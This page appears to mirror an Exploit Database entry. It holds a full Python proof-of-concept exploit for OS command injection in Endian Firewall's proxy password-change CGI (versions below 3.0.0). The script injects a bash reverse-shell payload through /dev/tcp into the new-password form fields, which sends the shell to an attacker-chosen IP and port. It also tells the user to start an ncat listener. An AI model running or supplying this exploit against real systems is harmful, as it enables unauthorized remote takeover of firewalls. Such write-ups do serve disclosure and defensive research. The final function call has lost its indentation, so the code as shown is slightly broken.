Endian Firewall < 3.0.0 - OS Command Injection

• Exploit Database
• 53 阅读

• 作者： Ben Lincoln
  日期： 2015-06-29
• 类别：

  • remote
  平台：

  • cgi
• 来源：https://www.exploit-db.com/exploits/37426/

• #!/usr/bin/env python
  
  # Endian Firewall Proxy User Password Change (/cgi-bin/chpasswd.cgi)
  # OS Command Injection Exploit POC (Reverse TCP Shell)
  # Ben Lincoln, 2015-06-28
  # http://www.beneaththewaves.net/
  # Requires knowledge of a valid proxy username and password on the target Endian Firewall
  
  import httplib
  import sys
  
  proxyUserPasswordChangeURI = "/cgi-bin/chpasswd.cgi"
  
  def main():
  	if len(sys.argv) < 7:
  		print "Endian Firewall Proxy User Password Change (/cgi-bin/chpasswd.cgi) Exploit\r\n"
  		print "Usage: " + sys.argv[0] + " [TARGET_SYSTEM_IP] [TARGET_SYSTEM_WEB_PORT] [PROXY_USER_NAME] [PROXY_USER_PASSWORD] [REVERSE_SHELL_IP] [REVERSE_SHELL_PORT]\r\n"
  		print "Example: " + sys.argv[0] + " 172.16.97.1 10443 proxyuser password123 172.16.97.17 443\r\n"
  		print "Be sure you've started a TCP listener on the specified IP and port to receive the reverse shell when it connects.\r\n"
  		print "E.g. ncat -nvlp 443"
  		sys.exit(1)
  
  	multipartDelimiter = "---------------------------334002631541493081770656718"
  	
  	targetIP = sys.argv[1]
  	targetPort = sys.argv[2]
  	userName = sys.argv[3]
  	password = sys.argv[4]
  	reverseShellIP = sys.argv[5]
  	reverseShellPort = sys.argv[6]
  
  	exploitString = password + "; /bin/bash -c /bin/bash -i >& /dev/tcp/" + reverseShellIP + "/" + reverseShellPort + " 0>&1;"
  
  	endianURL = "https://" + targetIP + ":" + targetPort + proxyUserPasswordChangeURI
  
  	conn = httplib.HTTPSConnection(targetIP, targetPort)
  	headers = {}
  	headers["User-Agent"] = "Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.3.0"
  	headers["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
  	headers["Accept-Encoding"] = ""
  	headers["Referer"] = "https://" + targetIP + ":" + targetPort + proxyUserPasswordChangeURI
  	headers["Content-Type"] = "multipart/form-data; boundary=" + multipartDelimiter
  	headers["Accept-Language"] = "en-US,en;q=0.5"
  	headers["Connection"] = "keep-alive"
  
  	multipartDelimiter = "--" + multipartDelimiter
  
  	body = multipartDelimiter + "\r\n"
  	body = body + "Content-Disposition: form-data; name=\"ACTION\"\r\n\r\n"
  	body = body + "change\r\n"
  	body = body + multipartDelimiter + "\r\n"
  	body = body + "Content-Disposition: form-data; name=\"USERNAME\"\r\n\r\n"
  	body = body + userName + "\r\n"
  	body = body + multipartDelimiter + "\r\n"
  	body = body + "Content-Disposition: form-data; name=\"OLD_PASSWORD\"\r\n\r\n"
  	body = body + password + "\r\n"
  	body = body + multipartDelimiter + "\r\n"
  	body = body + "Content-Disposition: form-data; name=\"NEW_PASSWORD_1\"\r\n\r\n"
  	body = body + exploitString + "\r\n"
  	body = body + multipartDelimiter + "\r\n"
  	body = body + "Content-Disposition: form-data; name=\"NEW_PASSWORD_2\"\r\n\r\n"
  	body = body + exploitString + "\r\n"
  	body = body + multipartDelimiter + "\r\n"
  	body = body + "Content-Disposition: form-data; name=\"SUBMIT\"\r\n\r\n"
  	body = body + "Change password\r\n"
  	body = body + multipartDelimiter + "--" + "\r\n"
  
  	conn.request("POST", proxyUserPasswordChangeURI, body, headers)
  	response = conn.getresponse()
  	print "HTTP " + str(response.status) + " " + response.reason + "\r\n"
  	print response.read()
  	print "\r\n\r\n"
  
  if __name__ == "__main__":
  main()